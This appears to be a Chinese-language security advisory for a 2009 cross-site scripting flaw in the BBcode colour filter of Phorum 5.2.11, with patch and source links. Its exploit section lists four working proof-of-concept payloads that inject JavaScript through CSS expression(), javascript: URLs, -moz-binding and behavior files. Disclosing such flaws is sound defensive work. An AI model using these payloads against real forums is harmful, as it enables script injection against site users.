添加时间:
2009-07-24

系统编号:
WAVDB-01470
BUGTRAQ: 35777

影响版本:
Phorum 5.2.11

程序介绍:

Phorum是一款基于PHP的WEB论坛程序，可在Linux和Unix操作系统下使用，也可在Microsoft Windows操作系统下使用。

漏洞分析:

Phorum的过滤引擎没有充分地验证某些BBcode参数，远程攻击者可以在所提交的请求中使用导致注入并执行恶意JavaScript代码。


漏洞利用:

[color=#000000;background-image:url(javascript:alert('Sysdream_IE6_Alert'));]Sysdream Testing IE6[/color]
[color=#000000;xss:expression(alert('Sysdream_IE7_Alert'));]Sysdream Testing XSS[/color]
[color=#000000;-moz-binding:url(http://127.0.0.1/phorum/file.php?0,file=9,filename=script.xml#mycode);]Sysdream Testing FF[/color]
[color=#000000;behavior:url(http://127.0.0.1/phorum/file.php?0,file=8,filename=script.htc);]Sysdream Testing FF[/color]

解决方案:
厂商补丁：

Phorum
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.phorum.org/phorum5/read.php?64,139411

信息来源:
<*来源：crashfr （crashfr@sysdream.com）

链接：http://milw0rm.com/exploits/9231
http://secunia.com/advisories/35928/
*>